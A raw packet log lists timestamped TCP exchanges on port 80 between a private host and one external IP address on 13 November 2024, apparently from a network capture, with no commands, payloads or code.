Nov 13, 2024 10:53:20.550889015 CET	49977	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:20.556014061 CET	80	49977	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:20.556096077 CET	49977	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:20.556585073 CET	49977	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:20.556936979 CET	49977	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:20.563676119 CET	80	49977	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:20.563700914 CET	80	49977	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.045538902 CET	80	49977	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.045691013 CET	49977	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:29.045938969 CET	49977	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:29.051748037 CET	80	49977	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.592644930 CET	49978	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:29.597553968 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.597671032 CET	49978	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:29.597868919 CET	49978	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:29.598329067 CET	49978	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:29.602643013 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.602725983 CET	49978	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:29.603207111 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.603280067 CET	49978	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:29.603308916 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.603358984 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.603368998 CET	49978	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:29.603389025 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.603410959 CET	49978	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:29.603416920 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.603435993 CET	49978	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:29.603466988 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.603497028 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.603524923 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.603552103 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.607598066 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.608428001 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.608458042 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.608484983 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.608592033 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.608619928 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:29.649419069 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:38.220794916 CET	80	49978	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:38.624114990 CET	49979	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:38.629605055 CET	80	49979	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:38.629694939 CET	49979	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:38.629818916 CET	49979	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:38.630177021 CET	49979	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:38.635735989 CET	80	49979	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:38.636195898 CET	80	49979	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.122709990 CET	80	49979	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.122817993 CET	49979	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.122908115 CET	49979	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.127899885 CET	80	49979	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.802076101 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.808523893 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.808703899 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.808826923 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.809458971 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.814652920 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.814718962 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.815444946 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.815459967 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.815501928 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.815525055 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.815582991 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.815597057 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.815609932 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.815625906 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.815646887 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.815731049 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.815743923 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.815757036 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.815778017 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.815795898 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.820873976 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.820888042 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.820944071 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.821806908 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.821820974 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.821832895 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.821846008 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.821865082 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.821868896 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.821902990 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.861413002 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.861589909 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.913467884 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.914110899 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:47.965478897 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:47.967101097 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.013443947 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.013595104 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.061461926 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.061572075 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.113558054 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.113713026 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.165502071 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.165736914 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.214562893 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.214729071 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.266756058 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.266932011 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.315388918 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.315529108 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.362574100 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.363095999 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.410700083 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.410917044 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.462791920 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.462986946 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.513436079 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.513510942 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.565447092 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.565632105 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.613421917 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.613480091 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.661436081 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.661494970 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.709423065 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.709479094 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.757481098 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.757647991 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.805444002 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.805563927 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.853450060 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.853555918 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.901410103 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.901513100 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.949409962 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.949486971 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:48.997845888 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:48.997931957 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.049565077 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.049712896 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.097527027 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.097623110 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.149497032 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.149586916 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.197993994 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.198111057 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.245539904 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.245601892 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.297538996 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.297606945 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.346976042 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.347100973 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.394840956 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.395023108 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.441422939 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.441533089 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.490514994 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.490652084 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.541763067 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.541897058 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.591151953 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.591283083 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.637656927 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.637747049 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.685681105 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.685791969 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.734527111 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.734740019 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.786758900 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.786917925 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.837513924 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.837578058 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.885752916 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.885816097 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.933497906 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.933609009 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:49.983243942 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:49.983434916 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.031234980 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.031514883 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.077790022 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.077876091 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.125658035 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.125845909 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.177422047 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.177530050 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.225610018 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.225753069 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.273679018 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.273785114 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.325531006 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.325625896 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.373601913 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.373706102 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.421468973 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.421559095 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.472023964 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.472158909 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.521847963 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.521985054 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.573549986 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.573683023 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.625768900 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.625930071 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.673599958 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.673768044 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.721674919 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.721875906 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.773519993 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.773610115 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.825675964 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.825845957 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.881746054 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.881937981 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.933605909 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.933751106 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:50.985542059 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:50.985630989 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.033593893 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.033660889 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.081600904 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.081681967 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.129627943 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.129705906 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.177510977 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.177634001 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.225697041 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.225783110 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.277558088 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.277750015 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.325613022 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.325732946 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.373575926 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.373672009 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.421494007 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.421610117 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.469645023 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.469758034 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.517658949 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.517777920 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.565596104 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.565774918 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.613465071 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.613533974 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.661477089 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.661614895 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.709547043 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.709647894 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.761825085 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.761881113 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.809541941 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.809606075 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.857405901 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.857475996 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.909456015 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.909533024 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:51.957493067 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:51.957561016 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.249345064 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.249490023 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.254513979 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.254587889 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.301585913 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.301666975 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.353729010 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.353830099 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.405599117 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.405698061 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.453676939 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.453777075 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.501431942 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.501538038 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.549566031 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.549758911 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.597618103 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.599203110 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.646018028 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.646157026 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.693696976 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.693774939 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.741628885 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.741719961 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.789597034 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.789669991 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.837852955 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.837925911 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.889739037 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.889836073 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.941690922 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.941772938 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:52.993562937 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:52.993947029 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.041555882 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.041645050 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.093668938 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.093786001 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.141562939 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.141639948 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.189693928 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.189769983 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.237540007 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.237620115 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.285653114 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.285734892 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.333535910 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.333651066 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.385687113 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.386941910 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.437515974 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.437599897 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.489686966 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.494798899 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.541485071 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.541598082 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.589710951 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.595185995 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.641726017 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.643182993 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.689627886 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.691204071 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.737832069 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.738475084 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.789572954 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.789645910 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.837567091 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.837640047 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.885520935 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.885608912 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.937536001 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.937616110 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:53.985533953 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:53.985652924 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.033554077 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.033629894 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.081484079 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.081552029 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.133644104 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.133730888 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.185512066 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.185657024 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.233567953 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.233710051 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.281735897 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.281914949 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.330526114 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.331252098 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.377649069 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.377733946 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.429718971 CET	80	49980	94.158.244.69	192.168.2.9
